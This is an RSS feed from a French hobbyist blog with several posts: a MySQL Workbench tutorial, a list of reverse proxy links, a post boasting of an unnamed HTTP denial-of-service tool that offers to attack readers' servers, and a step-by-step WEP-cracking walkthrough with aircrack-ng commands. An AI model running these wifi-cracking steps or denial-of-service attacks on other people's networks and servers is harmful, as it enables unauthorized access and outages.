<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Friendly Froggy ;-) &#187; Serveur</title>
	<atom:link href="http://www.friendly-froggy.net/category/serveur/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.friendly-froggy.net</link>
	<description>Ubuntu, logiciels libres et entrepreneurs</description>
	<lastBuildDate>Thu, 05 Jan 2012 12:07:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Faire un schéma de sa base de donnée: MySQL Workbench 5.1</title>
		<link>http://www.friendly-froggy.net/2010/01/21/faire-un-schema-de-sa-base-de-donnee-mysql-mysql-workbench-5-1/</link>
		<comments>http://www.friendly-froggy.net/2010/01/21/faire-un-schema-de-sa-base-de-donnee-mysql-mysql-workbench-5-1/#comments</comments>
		<pubDate>Thu, 21 Jan 2010 14:48:22 +0000</pubDate>
		<dc:creator>PH</dc:creator>
				<category><![CDATA[Serveur]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[MySQL]]></category>
		<category><![CDATA[Workbench]]></category>

		<guid isPermaLink="false">http://www.friendly-froggy.net/?p=583</guid>
		<description><![CDATA[Dans le cadre de mon stage on m&#8217;a montré un beau schéma de la base de donnée de l&#8217;un des sites internet de l&#8217;entreprise et ma première pensée, un tantinet primitive, fût: &#171;&#160;Quoi??!! C&#8217;est possible de faire ça??!! Trop coooool!!!! &#160;&#187; Ni une, ni deux, a peine rentré chez moi que je me mets à [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-585" title="MySQL Workbench Ubuntu" src="http://www.friendly-froggy.net/wp-content/uploads/2010/01/mysql-workbench.png" alt="mysql-workbench" width="544" height="160" /></p>
<p>Dans le cadre de mon stage on m&#8217;a montré un beau schéma de la base de donnée de l&#8217;un des sites internet de l&#8217;entreprise et ma première pensée, un tantinet primitive, fût: <strong>&laquo;&nbsp;Quoi??!! C&#8217;est possible de faire ça??!! Trop coooool!!!! <img src='http://www.friendly-froggy.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> &nbsp;&raquo;</strong></p>
<p>Ni une, ni deux, a peine rentré chez moi que je me mets à faire quelques recherche sur Google pour tomber sur <strong>MySQL Workbench</strong>. Aïe ça marche sous Linux ça?? Ben oui!!! <img src='http://www.friendly-froggy.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Après avoir installé le .deb <a title="MySQL Workbench 5.1 pour Ubuntu" href="http://www.friendly-froggy.net/wp-content/uploads/2010/01/mysql-workbench-oss-5.1.16-1-i386.deb">MySQL Workbench 5.1.16 (i386) </a>je me suis mis à faire un petit schéma d&#8217;une base sous <strong>Magento</strong> pour voir ce que ça donne (et c&#8217;est un joyeux bordel! :s).</p>
<p>Donc voici les explications en images une fois le paquet installé.</p>
<p>Tout d&#8217;abord se rendre dans: <strong>Applications</strong> =&gt; <strong>Programmation </strong>=&gt; <strong>MySQL Workbench</strong></p>
<p><span id="more-583"></span></p>
<p><a href="http://www.friendly-froggy.net/wp-content/uploads/2010/01/Capture1.png"><img class="alignleft size-full wp-image-586" title="Capture" src="http://www.friendly-froggy.net/wp-content/uploads/2010/01/Capture1.png" alt="Capture" width="691" height="432" /></a></p>
<p>Il vous faut ensuite cliquer sur: <strong>Database</strong> =&gt; <strong>Manage Connection</strong></p>
<p>Ensuite cliquez sur &laquo;&nbsp;New&nbsp;&raquo; pour rentrer une nouvelle connexion à un serveur MySQL. Dans mon exemple je suis en local, donc je rentre localhost (127.0.0.1), root en user et le mot de passe root.</p>
<p><a href="http://www.friendly-froggy.net/wp-content/uploads/2010/01/Capture-1.png"><img class="alignleft size-full wp-image-587" title="Capture-1" src="http://www.friendly-froggy.net/wp-content/uploads/2010/01/Capture-1.png" alt="Capture-1" width="691" height="432" /></a></p>
<p>Cliquez ensuite sur: <strong>Database</strong> =&gt; <strong>Reverse Engineer</strong></p>
<p>Ensuite selection la connextion crée précédement et cliquez sur Next</p>
<p><a href="http://www.friendly-froggy.net/wp-content/uploads/2010/01/Capture-2.png"><img class="alignleft size-full wp-image-588" title="Capture-2" src="http://www.friendly-froggy.net/wp-content/uploads/2010/01/Capture-2.png" alt="Capture-2" width="691" height="432" /></a></p>
<p>Choisissez ensuite la base pour laquelle vous voulez faire un schéma, puis Next (ici j&#8217;ai selectionné Joomla, mais en fait c&#8217;est Magento)</p>
<p><a href="http://www.friendly-froggy.net/wp-content/uploads/2010/01/Capture-3.png"><img class="alignleft size-full wp-image-589" title="Capture-3" src="http://www.friendly-froggy.net/wp-content/uploads/2010/01/Capture-3.png" alt="Capture-3" width="691" height="432" /></a></p>
<p>Et voila! Ici un petit zoom sur quelques tables</p>
<p><a href="http://www.friendly-froggy.net/wp-content/uploads/2010/01/Capture-4.png"><img class="alignleft size-full wp-image-590" title="Capture-4" src="http://www.friendly-froggy.net/wp-content/uploads/2010/01/Capture-4.png" alt="Capture-4" width="691" height="432" /></a></p>
<p>Et ici un dezoom sur l&#8217;ensemble des tables de Magento&#8230; bon courage pour s&#8217;y retrouver&#8230;.</p>
<p><a href="http://www.friendly-froggy.net/wp-content/uploads/2010/01/Capture-5.png"><img class="alignleft size-full wp-image-592" title="Capture-5" src="http://www.friendly-froggy.net/wp-content/uploads/2010/01/Capture-5.png" alt="Capture-5" width="691" height="432" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.friendly-froggy.net/2010/01/21/faire-un-schema-de-sa-base-de-donnee-mysql-mysql-workbench-5-1/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Les solutions de reverse cache proxy pour pallier aux problèmes de cache</title>
		<link>http://www.friendly-froggy.net/2010/01/13/les-solutions-de-reverse-cache-proxy-pour-pallier-aux-problemes-de-cache/</link>
		<comments>http://www.friendly-froggy.net/2010/01/13/les-solutions-de-reverse-cache-proxy-pour-pallier-aux-problemes-de-cache/#comments</comments>
		<pubDate>Wed, 13 Jan 2010 13:14:23 +0000</pubDate>
		<dc:creator>PH</dc:creator>
				<category><![CDATA[Serveur]]></category>
		<category><![CDATA[cache]]></category>
		<category><![CDATA[Drupal]]></category>
		<category><![CDATA[Haproxy]]></category>
		<category><![CDATA[Magento]]></category>
		<category><![CDATA[memcached]]></category>
		<category><![CDATA[mod_proxy]]></category>
		<category><![CDATA[NGINX]]></category>
		<category><![CDATA[Pound]]></category>
		<category><![CDATA[proxy]]></category>
		<category><![CDATA[reverse cache proxy]]></category>
		<category><![CDATA[Squid]]></category>
		<category><![CDATA[Varnish]]></category>

		<guid isPermaLink="false">http://www.friendly-froggy.net/?p=547</guid>
		<description><![CDATA[Dans le cadre de mon stage en tant qu&#8217;assistant chef de projet web on m&#8217;a demandé de me renseigner sur des solutions pour améliorer le système de cache du site. En effet celui-ci est sous Drupal et rencontre quelques lenteurs même avec Memcached. L&#8217;idée est d&#8217;avoir d&#8217;un coté un serveur web et de l&#8217;autre un [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Dans le cadre de mon stage en tant qu&#8217;assistant chef de projet web<a title="Balado" href="http://www.balado.fr"></a> on m&#8217;a demandé de me renseigner sur des solutions pour améliorer le système de cache du site. En effet celui-ci est sous <a title="Drupal" href="http://drupalfr.org">Drupal</a> et rencontre quelques lenteurs même avec <a title="Memcached" href="http://memcached.org">Memcached</a>. L&#8217;idée est d&#8217;avoir d&#8217;un coté un serveur web et de l&#8217;autre un serveur de cache. La solution semble se trouver du coté d&#8217;un <strong>Reverse Cache Proxy</strong>.</p>
<h3><span style="text-decoration: underline;">Fonctionnement d&#8217;un Reverse Cache Proxy:</span></h3>
<p style="text-align: center;"><img class="size-full wp-image-549 aligncenter" title="revproxy2" src="http://www.friendly-froggy.net/wp-content/uploads/2010/01/revproxy2.PNG" alt="revproxy2" width="230" height="280" /></p>
<h3><span id="more-547"></span></h3>
<h3><span style="text-decoration: underline;">Les Solutions de Reverse Cache Proxy</span></h3>
<ul>
<li>
<p style="margin-bottom: 0cm;"><strong>Apache (mod_proxy) </strong><span style="font-family: Calibri;">♥♥</span></p>
<ul>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://www.acm.org/crossroads/xrds7-5/proxy.html"><strong>Apache comme Proxy<br />
</strong></a></span></span></span></li>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://ubuntuforums.org/showthread.php?t=619998"><strong>HowTo : installer Apache en reverse proxy (Ubuntu server)</strong></a></span></span></span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://blogs.sun.com/partnertech/entry/operating_a_drupal_site_behind"><strong>Manager Drupal derière un reverse proxy<br />
</strong></a></span></span></span></li>
</ul>
</li>
</ul>
<p style="margin-left: 2.54cm; margin-bottom: 0cm;">
<ul>
<li>
<p style="margin-bottom: 0cm;"><strong>Squid </strong><span style="font-family: Calibri;">♥♥♥ </span><span style="font-family: Arial,serif;">(longue expérience dans le caching)</span></p>
<ul>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://www.visolve.com/squid/whitepapers/reverseproxy.php"><strong>Squid 		Reverse Proxy</strong></a></span></span></span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://2bits.com/articles/increasing-drupals-speed-squid-caching-reverse-proxy.html"><strong>Drupal 		&amp; Squid proxy cache </strong></a></span></span></span><span style="font-family: Calibri;"><strong>♥♥♥♥</strong></span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://www.wikigento.com/tag/reverse-proxy/"><strong>Infra sous Magento (Squid+Memcached) </strong></a></span></span></span><span style="font-family: Calibri;"><strong>♥♥♥</strong></span></p>
</li>
</ul>
</li>
</ul>
<p style="margin-left: 2.54cm; margin-bottom: 0cm;">
<ul>
<li>
<p style="margin-bottom: 0cm;"><strong>NGINX </strong><span style="font-family: Calibri;">♥♥♥</span><span style="font-family: Arial,serif;"> : 	utilisé par de très gros sites (<span style="text-decoration: underline;">ex </span>: WordPress.com, Hulu, 	Gravatar, Youporn… désolé pour la référence mais quand même 57e mondial selon Alexa&#8230;)</span></p>
<ul>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://www.papygeek.com/software/optimiser-son-serveur-web-avec-nginx/"><strong>Intro 		et configuration</strong></a></span></span></span><strong> (Papy Geek)</strong></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://www.korben.info/configurer-nginx-reverse-proxy.html"><strong>Intro 		et configuration</strong></a></span></span></span><strong> (Korben)</strong></p>
</li>
</ul>
</li>
</ul>
<p style="margin-left: 2.54cm; margin-bottom: 0cm;">
<ul>
<li>
<p style="margin-bottom: 0cm;"><strong>Varnish </strong>(jamais entendu 	parler mais revient très souvent comme solution Pro pour grosses 	infrastructures)</p>
<ul>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://mikkel.hoegh.org/blog/2008/oct/17/drupal-varnish-http-accellerator/"><strong>Drupal 		&amp; Varnish</strong></a></span></span></span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://blogs.osuosl.org/gchaix/2009/10/12/pressflow-varnish-and-caching/"><strong>Pressflow 		for Drupal (support for squid caching)</strong></a></span></span></span></p>
</li>
</ul>
</li>
</ul>
<ul>
<li>
<p style="margin-bottom: 0cm;"><strong>Haproxy</strong> (load balancer, 	pour le cache je ne sais pas) (anti-slowloris par excellence)</p>
</li>
<li>
<p style="margin-bottom: 0cm;"><strong>Pound</strong> (reverse-proxy load 	balancing server) (<span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://www.cyberciti.biz/faq/linux-http-https-reverse-proxy-load-balancer/">installation</a></span></span></span>)</p>
</li>
</ul>
<p></p>
<h3 style="margin-bottom: 0cm;"><span style="font-size: medium;"><span style="text-decoration: underline;"><strong>Comparatifs :</strong></span></span></h3>
<ul>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://vulture.open-source.fr/wiki/Bench">Benchmark 	(Apache, Vulture, ISA Serveur)</a></span></span></span> <span style="font-family: Calibri;">♥♥♥</span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://buytaert.net/drupal-webserver-configurations-compared"><span style="font-family: Arial,serif;">Drupal 	webserver configuration compared</span></a></span></span></span><span style="font-family: Arial,serif;"> </span><span style="font-family: Calibri;">♥♥</span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://securit.free.fr/ressources/proxy.htm">Comparaisons 	qui datent sur des solutions obscures</a></span></span></span>…</p>
</li>
</ul>
<p style="margin-bottom: 0cm;">
<p></p>
<h3 style="margin-bottom: 0cm;"><span style="font-size: medium;"><span style="text-decoration: underline;"><strong>Cas Pratiques :</strong></span></span></h3>
<ul>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://www.virtua-network.com/blogonews/performances-magento">Virtua 	Network (NGINX + Varnish)</a></span></span></span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://www.karlesnine.com/tag/eZ%20publish/page/2">Voici.fr 	avec un proxy Squid</a></span></span></span> (<a title="Karlesnine" href="http://www.karlesnine.com">Karlesnine.com</a> un très bon 	blog d&#8217;un admin système. <strong>A must follow!</strong>)</p>
</li>
<li>
<p style="margin-bottom: 0cm;"><span style="color: #0000ff;"><span lang="zxx"><span style="text-decoration: underline;"><a href="http://www.karlesnine.com/post/2009/10/27/Voici.fr-Interet-de-l-optimisation-web-cache-et-des-performance-des-reverses-proxys">Voici.fr 	optimisation cache</a></span></span></span> (Karlesnine.com)</p>
</li>
</ul>
<p>Voili voilou, j&#8217;espère que vous trouverez votre bonheur là dedans. En ce qui me concerne je pencherai soit pour <strong>Squid</strong>, soit pour <strong>NGINX</strong>.</p>
<p style="text-align: center;"><img class="size-full wp-image-551 aligncenter" title="NGINX Reverse Cache proxy" src="http://www.friendly-froggy.net/wp-content/uploads/2010/01/infrastructure-495x425.png" alt="NGINX Reverse Cache proxy" width="495" height="425" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.friendly-froggy.net/2010/01/13/les-solutions-de-reverse-cache-proxy-pour-pallier-aux-problemes-de-cache/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Mettre down n&#8217;importe quel serveur sous Apache en moins de 7 secondes!</title>
		<link>http://www.friendly-froggy.net/2009/11/28/mettre-down-nimporte-quel-serveur-sous-apache-en-moins-de-7-secondes/</link>
		<comments>http://www.friendly-froggy.net/2009/11/28/mettre-down-nimporte-quel-serveur-sous-apache-en-moins-de-7-secondes/#comments</comments>
		<pubDate>Sat, 28 Nov 2009 11:06:40 +0000</pubDate>
		<dc:creator>PH</dc:creator>
				<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[flood]]></category>
		<category><![CDATA[http]]></category>
		<category><![CDATA[syn]]></category>

		<guid isPermaLink="false">http://www.friendly-froggy.net/?p=478</guid>
		<description><![CDATA[Bonjour Hier j&#8217;ai découvert un programme sous perl des plus effrayant qui soit: il permet de mettre à genoux n&#8217;importe quel serveur web utilisant Apache en quelques secondes. Le programme est d&#8217;une simplicité enfantine et ne nécessite aucune puissance de calcul (donc pas besoin de botnet). Il se base sur une attaque de type SYN [...]]]></description>
			<content:encoded><![CDATA[<p>Bonjour</p>
<p>Hier j&#8217;ai découvert un programme sous perl des plus effrayant qui soit: il permet de mettre à genoux n&#8217;importe quel serveur web utilisant Apache en quelques secondes. Le programme est d&#8217;une simplicité enfantine et ne nécessite aucune puissance de calcul (donc pas besoin de botnet). Il se base sur une attaque de type SYN mais au lieu de flooder en TCP il flood en HTTP (il fallait y penser!!!).</p>
<p>Je l&#8217;ai personnellement essayé: redoutable! Aucun serveur n&#8217;est à l&#8217;abri quelque soit son load balancing! Le problème pour les admins c&#8217;est qu&#8217;<span style="text-decoration: underline;">il n&#8217;existe aucun moyen de s&#8217;en protéger</span> à part avec un reverse proxy et encore!!!</p>
<p>Là vous allez me dire: <em>&laquo;&nbsp;Bon d&#8217;accord c&#8217;est quoi le nom de ton programme?&nbsp;&raquo;</em>. MAIS VOUS RÊVEZ!! Si je vous le donnais, la première chose que vous feriez c&#8217;est mettre down mon serveur! Or je ne peux pas m&#8217;en protéger&#8230; Je signerai mon propre arrêt de mort et celui de tous les serveurs web qui vous passerai par la tête! D&#8217;ailleurs personne n&#8217;a d&#8217;intérêt à ce qu&#8217;il devienne populaire! Je vous rappelle qu&#8217;Apache c&#8217;est 67% du marché selon Netcraft!</p>
<p>Mais je comprend votre curiosité alors je vous donne un indice:</p>
<p><span style="color: #00ff00;"><img class="alignleft size-full wp-image-482" title="apache_fear" src="http://www.friendly-froggy.net/wp-content/uploads/2009/11/apache_fear.jpg" alt="apache_fear" width="574" height="405" /></span></p>
<p>Si vous trouvez le nom de l&#8217;animal en anglais, vous n&#8217;aurez pas de mal à trouver le programme en question (non ce n&#8217;est pas un Panda&#8230;. )</p>
<p><span style="color: #00ff00;"><span style="color: #000000;"><span style="text-decoration: underline;">PS</span>: si vous ne croyez pas, donnez moi l&#8217;adresse de votre serveur web et une heure donnée pour une attaque (hors pointe de trafic de préférence) et vous verrez l&#8217;ampleur de la chose&#8230;. </span><br />
</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.friendly-froggy.net/2009/11/28/mettre-down-nimporte-quel-serveur-sous-apache-en-moins-de-7-secondes/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Cracker une clé WEP en moins de 5 minutes&#8230;</title>
		<link>http://www.friendly-froggy.net/2009/11/26/cracker-une-cle-wep-en-moins-de-5-minutes/</link>
		<comments>http://www.friendly-froggy.net/2009/11/26/cracker-une-cle-wep-en-moins-de-5-minutes/#comments</comments>
		<pubDate>Thu, 26 Nov 2009 21:45:15 +0000</pubDate>
		<dc:creator>PH</dc:creator>
				<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[aircrack-ng]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wifi]]></category>

		<guid isPermaLink="false">http://www.friendly-froggy.net/?p=445</guid>
		<description><![CDATA[Bonjour! En ce moment en cours on parle de temps à autre de sécurité sur les réseaux wifi et autre. Or parfois je fais le mec chiant en disant &#171;&#160;Oui, mais c&#8217;est pas sécurisé&#160;&#187; etc. On me regarde avec des yeux ronds et certains doivent penser &#171;&#160;Oui bon, la sécurité, à moins de tomber sur [...]]]></description>
			<content:encoded><![CDATA[<p>Bonjour!</p>
<p>En ce moment en cours on parle de temps à autre de <strong>sécurité sur les réseaux wifi</strong> et autre. Or parfois je fais le mec chiant en disant <em>&laquo;&nbsp;Oui, mais c&#8217;est pas sécurisé&nbsp;&raquo;</em> etc. On me regarde avec des yeux ronds et certains doivent penser <em>&laquo;&nbsp;Oui bon, la sécurité, à moins de tomber sur un super hacker, pas trop de risques&#8230; arrête de nous faire chier!&nbsp;&raquo;</em>. Hé bien non justement&#8230; Je vais vous montrer à quel point il est simple de craker une clé WEP sur un réseau sans fils et qu&#8217;il est nul besoin d&#8217;être un génie en informatique&#8230; la preuve, même moi j&#8217;y arrive et je suis tout sauf un génie&#8230;</p>
<p>Passons à la pratique: que faut-il pour cracker une clé WEP? Il faut:</p>
<p>- Un PC: un laptop de préférence</p>
<p>- Un bon OS: j&#8217;utiliserai <strong>Backtrack 3</strong>, une distribution Linux dédiée à la sécurité</p>
<p>- Une bonne carte wifi: une <strong>Alfa AWUS036H </strong> <img src='http://www.friendly-froggy.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> <strong><br />
</strong></p>
<p>La première étape est d&#8217;installer Backtrack sur une clé USB et de la rendre bootable, rien de plus simple: télécharger Backtrack USB et exécuter <strong>bootinst.sh</strong> (dans BOOT). Ensuite on la colle dans les fesses du laptop, on branche sa carte wifi, on démarre le portable et on boot sur la clé dans le BIOS.</p>
<p><a href="http://www.friendly-froggy.net/wp-content/uploads/2009/11/matos.JPG"><img class="alignleft size-full wp-image-446" title="AWUS036H 1000mW" src="http://www.friendly-froggy.net/wp-content/uploads/2009/11/matos.JPG" alt="AWUS036H 1000mW" width="480" height="360" /></a></p>
<p>Une fois sous Backtrack on ouvre un terminal et on tape:</p>
<blockquote><p>iwconfig</p></blockquote>
<p>ce qui doit donner un truc ressemblant à ça:</p>
<p><span id="more-445"></span></p>
<blockquote><p>wlan2     IEEE 802.11bg  ESSID:&nbsp;&raquo;FreeWifi&nbsp;&raquo;<br />
Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated<br />
Tx-Power=20 dBm<br />
Retry min limit:7   RTS thr:off   Fragment thr=2352 B<br />
Power Management:off<br />
Link Quality:0  Signal level:0  Noise level:0<br />
Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0<br />
Tx excessive retries:0  Invalid misc:0   Missed beacon:0</p></blockquote>
<p>Ce qui nous intéresse c&#8217;est <strong>wlan2</strong> qui est notre carte wifi.</p>
<p>Maintenant pour écouter le trafic il faut passer la carte en mode monitor. Backtrack fourni la suite logicielle <strong>aircrack-ng</strong> qui le permet (note: sous ubuntu, installer en tapant <strong>sudo apt-get install aircrack-ng</strong>). Pour passer la carte en mode monitor il suffit d&#8217;utiliser airmon-ng, pour cela:</p>
<blockquote><p>airmon-ng start wlan2</p></blockquote>
<p>Ce qui donne un truc du style:</p>
<blockquote><p>Found 5 processes that could cause trouble.<br />
If airodump-ng, aireplay-ng or airtun-ng stops working after<br />
a short period of time, you may want to kill (some of) them!</p>
<p>PID    Name<br />
3597    NetworkManager<br />
3616    wpa_supplicant<br />
3621    avahi-daemon<br />
3622    avahi-daemon<br />
4643    dhclient</p>
<p>Interface    Chipset        Driver</p>
<p>wlan2        RTL8187     rtl8187 &#8211; [phy2]</p></blockquote>
<p>Bref, maintenant que tout est opérationnel on va rentrer dans le vif du sujet! <img src='http://www.friendly-froggy.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Ensuite nous allons chercher des réseaux wifi utilisant le cryptage WEP, pour cela:</p>
<blockquote><p>airodump-ng &#8211;encrypt wep wlan2</p></blockquote>
<p>Cela nous donne:</p>
<p><img class="alignleft size-full wp-image-448" title="scan airodump" src="http://www.friendly-froggy.net/wp-content/uploads/2009/11/scan.jpg" alt="scan airodump" width="648" height="324" /></p>
<p><strong>BSSID</strong>: correspond à l&#8217;adresse MAC du routeur (ex: Livebox, Neufbox, etc.)</p>
<p><strong>ESSID</strong>: c&#8217;est le nom du réseau (ex: neuf wifi)</p>
<p><strong>CH</strong>: pour channel, c&#8217;est le canal.</p>
<p>En dessous: <strong>STATION</strong>, c&#8217;est l&#8217;adresse MAC des PC clients connecté à la box (BSSID). Ici on voit qu&#8217;il identifie bien des clients mais qu&#8217;il n&#8217;arrive par à trouver à quelle box (BSSID) ils sont associés.</p>
<p><span style="text-decoration: underline;"><strong>NOTE:</strong></span> les screens du dessus sont sous Ubuntu, alors que les screens qui vont venir sont sous Backtrack. Sous Ubuntu, je n&#8217;avais pas de box associée, mais peu importe.</p>
<p>Imaginons donc que vous avez votre BSSID et une STATION connecté, vous lancez:</p>
<blockquote><p>airodump-ng -w DATA-NUMERICABLE -c 6 &#8211;bssid XX:XX:XX:XX:XX:XX wlan2</p></blockquote>
<p><span style="text-decoration: underline;">Explications:</span></p>
<p><strong>-w </strong>= écrire dans un fichier suivit du nom de fichier (ici DATA-NUMERICABLE)</p>
<p><strong>-c</strong> = le channel (ici le channel 6)</p>
<p><strong>&#8211; bssid</strong> = l&#8217;adresse mac de la box (BSSID)</p>
<p>Cette commande permet de cibler uniquement la connexion wifi voulue et à capturer les DATA dans un .cap</p>
<p><a href="http://www.friendly-froggy.net/wp-content/uploads/2009/11/capture.png"><img class="alignleft size-full wp-image-450" title="capture data" src="http://www.friendly-froggy.net/wp-content/uploads/2009/11/capture.png" alt="capture data" width="538" height="336" /></a></p>
<p>Maintenant que la capture est lancée, nous allons injecter des paquets pour faire grimper les DATA.Pour ce faire nous allons utiliser aireplay-ng en tapant:</p>
<blockquote><p>aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b XX:XX:XX:XX:XX:XX -h CC:CC:CC:CC:CC:CC wlan2</p></blockquote>
<p><strong>-c</strong> = n&#8217;importe quoi, une adresse MAC aléatoire</p>
<p><strong>-b </strong>= le BSSID de la box</p>
<p><strong>- h</strong> = l&#8217;adresse MAC de la station client connecté à la box</p>
<p>Une fois la commande lancée, il va se mettre à lire des paquets, puis vous proposer d&#8217;en injecter (voir screen). Un bon paquet commence par <strong>0842</strong> !!</p>
<p><a href="http://www.friendly-froggy.net/wp-content/uploads/2009/11/injection1.png"><img class="alignleft size-full wp-image-454" title="injection" src="http://www.friendly-froggy.net/wp-content/uploads/2009/11/injection1.png" alt="injection" width="538" height="336" /></a></p>
<p>Voila une fois que vous approuvez le paquet, l&#8217;injection commence et les DATA devraient grimper à mort! Si vous regardez mon screen précédent vous remarquerez  dans la colonne DATA que je suis déjà à <strong>87897 </strong>! En fait, j&#8217;ai fait le screen après avoir lancé le craquage du .cap (ce que je vais expliquer). Normalement à partir de 50000 vous pouvez commencer à craquer.</p>
<p>Dernière étape: le décryptage</p>
<p>On a donc fait nos capture dans le fichier DATA-NUMERICABLE, nous avons plus qu&#8217;à utiliser aircrack-ng, pour cela ouvrir dans un troisième terminal:</p>
<blockquote><p>aircrack-ng -P2 DATA-NUMERICABLE.cap</p></blockquote>
<p>Ayé c&#8217;est parti et normalement au bout de quelques minutes:</p>
<p><a href="http://www.friendly-froggy.net/wp-content/uploads/2009/11/keyfound1.png"><img class="alignleft size-full wp-image-455" title="keyfound" src="http://www.friendly-froggy.net/wp-content/uploads/2009/11/keyfound1.png" alt="keyfound" width="538" height="336" /></a></p>
<p>Voila c&#8217;est fini vous avez votre clé WEP! <img src='http://www.friendly-froggy.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><strong><span style="text-decoration: underline;">NOTE:</span></strong></p>
<p>Bien sûr vous n&#8217;avez le droit de faire ça que sur votre connexion pas sur celle du voisin. Vous me direz,<em> &laquo;&nbsp;Quel serait l&#8217;intérêt de le faire chez le voisin si ce n&#8217;est pour lui piquer sa connexion internet?&nbsp;&raquo;</em> Mais ça sert à plein de choses!!! Faire des MITM et de l&#8217;Arp Poisonning et piquer ses identifiants Gmail, Spoofer ses DNS, mener des attaques sur le web, etc&#8230; les utilisations illégales sont multiples, mais c&#8217;est INTERDIT! (et je suis un brave étudiant en Droit!! <img src='http://www.friendly-froggy.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  )</p>
<p>Voili, voilou et bon week-end</p>
]]></content:encoded>
			<wfw:commentRss>http://www.friendly-froggy.net/2009/11/26/cracker-une-cle-wep-en-moins-de-5-minutes/feed/</wfw:commentRss>
		<slash:comments>21</slash:comments>
		</item>
		<item>
		<title>Changer son adresse MAC</title>
		<link>http://www.friendly-froggy.net/2009/11/12/changer-son-adresse-mac/</link>
		<comments>http://www.friendly-froggy.net/2009/11/12/changer-son-adresse-mac/#comments</comments>
		<pubDate>Thu, 12 Nov 2009 18:56:41 +0000</pubDate>
		<dc:creator>PH</dc:creator>
				<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[adresse MAC]]></category>
		<category><![CDATA[macchanger]]></category>

		<guid isPermaLink="false">http://www.friendly-froggy.net/?p=409</guid>
		<description><![CDATA[Aujourd&#8217;hui lors de mon cours des techniques de résaux, l&#8217;intervenant nous a pondu une demi-vérité sur les adresses MAC qui tient à ce qu&#8217;une adresse MAC est unique et inchangeable. Vrai car l&#8217;adresse MAC matérielle n&#8217;est effectivement pas changeable, car inscrite sur la carte réseau, faux car on peut aisément la changer de manière logicielle [...]]]></description>
			<content:encoded><![CDATA[<p>Aujourd&#8217;hui lors de mon cours des techniques de résaux, l&#8217;intervenant nous a pondu une demi-vérité sur les adresses MAC qui tient à ce qu&#8217;une adresse MAC est unique et inchangeable. Vrai car l&#8217;adresse MAC matérielle n&#8217;est effectivement pas changeable, car inscrite sur la carte réseau, faux car on peut aisément la changer de manière logicielle et cela grâce à <strong>Macchanger</strong> sous Unix.</p>
